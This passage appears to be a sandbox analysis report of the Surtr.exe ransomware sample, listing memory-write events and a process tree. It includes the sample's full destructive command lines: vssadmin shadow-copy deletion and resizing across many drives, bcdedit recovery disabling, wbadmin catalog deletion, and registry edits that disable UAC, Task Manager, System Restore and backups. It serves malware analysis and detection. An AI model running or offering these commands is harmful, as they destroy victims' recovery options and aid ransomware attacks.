PID 3600 wrote to memory of 3024	3600	Surtr.exe	74
PID 3600 wrote to memory of 2096	3600	Surtr.exe	71
PID 3600 wrote to memory of 2096	3600	Surtr.exe	71
PID 3600 wrote to memory of 3696	3600	Surtr.exe	78
PID 3600 wrote to memory of 3696	3600	Surtr.exe	78
PID 3600 wrote to memory of 3384	3600	Surtr.exe	87
PID 3600 wrote to memory of 3384	3600	Surtr.exe	87
PID 3600 wrote to memory of 1764	3600	Surtr.exe	79
PID 3600 wrote to memory of 1764	3600	Surtr.exe	79
PID 3600 wrote to memory of 3584	3600	Surtr.exe	82
PID 3600 wrote to memory of 3584	3600	Surtr.exe	82
PID 3600 wrote to memory of 3352	3600	Surtr.exe	85
PID 3600 wrote to memory of 3352	3600	Surtr.exe	85
PID 3600 wrote to memory of 100	3600	Surtr.exe	84
PID 3600 wrote to memory of 100	3600	Surtr.exe	84
PID 3600 wrote to memory of 1420	3600	Surtr.exe	91
PID 3600 wrote to memory of 1420	3600	Surtr.exe	91
PID 3600 wrote to memory of 644	3600	Surtr.exe	90
PID 3600 wrote to memory of 644	3600	Surtr.exe	90
PID 3600 wrote to memory of 756	3600	Surtr.exe	102
PID 3600 wrote to memory of 756	3600	Surtr.exe	102
PID 3600 wrote to memory of 3968	3600	Surtr.exe	99
PID 3600 wrote to memory of 3968	3600	Surtr.exe	99
PID 3600 wrote to memory of 2268	3600	Surtr.exe	93
PID 3600 wrote to memory of 2268	3600	Surtr.exe	93
PID 3600 wrote to memory of 4112	3600	Surtr.exe	97
PID 3600 wrote to memory of 4112	3600	Surtr.exe	97
PID 3600 wrote to memory of 4120	3600	Surtr.exe	96
PID 3600 wrote to memory of 4120	3600	Surtr.exe	96
PID 3600 wrote to memory of 4128	3600	Surtr.exe	315
PID 3600 wrote to memory of 4128	3600	Surtr.exe	315
PID 3600 wrote to memory of 4180	3600	Surtr.exe	106
PID 3600 wrote to memory of 4180	3600	Surtr.exe	106
PID 3600 wrote to memory of 4232	3600	Surtr.exe	109
PID 3600 wrote to memory of 4232	3600	Surtr.exe	109
PID 3600 wrote to memory of 4240	3600	Surtr.exe	108
PID 3600 wrote to memory of 4240	3600	Surtr.exe	108
PID 3600 wrote to memory of 4316	3600	Surtr.exe	111
PID 3600 wrote to memory of 4316	3600	Surtr.exe	111
PID 3600 wrote to memory of 4324	3600	Surtr.exe	110

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1812	attrib.exe
6064	attrib.exe
5472	attrib.exe
5720	attrib.exe
4964	attrib.exe
4888	attrib.exe
4696	attrib.exe
5264	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Surtr.exe
"C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off
  2⤵
  PID:4044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Windows\SysWOW64\chcp.com
    chcp 437
    3⤵
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:1920
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  PID:2992
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  PID:3912
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  2⤵
  PID:1896
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  PID:2096
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  PID:3024
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  PID:1972
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  2⤵
  PID:3696
- - C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    3⤵
    PID:5208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  2⤵
  PID:1764
- - C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:5140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  PID:3584
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  2⤵
  PID:100
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  2⤵
  PID:3352
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    3⤵
    PID:6408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
  2⤵
  PID:3384
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6024
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:644
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:6812
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:1420
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:6380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
  2⤵
  PID:2268
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6844
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:4128
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:6860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:4120
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:6916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:4112
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:6736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3968
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:6924
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:756
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:6880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
  2⤵
  PID:4180
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:4240
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:7276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:4324
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:7368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
  2⤵
  PID:4316
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:4404
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:7408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:4468
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
  2⤵
  PID:4544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:4640
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:4744
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:7660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
  2⤵
  PID:4724
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:4660
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:7224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:4564
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
    3⤵
    PID:7560
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:4520
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:7668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:4788
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:7544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
  2⤵
  PID:4780
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7524
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:4840
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:7616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
  2⤵
  PID:4832
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:4940
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:7576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
  2⤵
  PID:4932
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
  2⤵
  PID:5020
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1416
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:7772
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:5092
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:8008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
  2⤵
  PID:4916
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
  2⤵
  PID:5164
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:5156
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:7812
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:5232
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:7988
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
  2⤵
  PID:5224
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
  2⤵
  PID:5056
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:5048
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:7788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
  2⤵
  PID:5300
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:7876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:5292
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:7820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
  2⤵
  PID:5376
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5432
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:7892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
  2⤵
  PID:5424
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:5392
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:8044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:5504
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:7828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
  2⤵
  PID:5568
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8168
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
  2⤵
  PID:5480
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:8020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  PID:5960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
  2⤵
  PID:6120
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7384
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
  2⤵
  PID:5476
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4620
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
  2⤵
  PID:6112
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4128
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
  2⤵
  PID:6096
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
  2⤵
  PID:6072
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
  2⤵
  PID:5996
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:7424
- C:\Windows\System32\cmd.exe
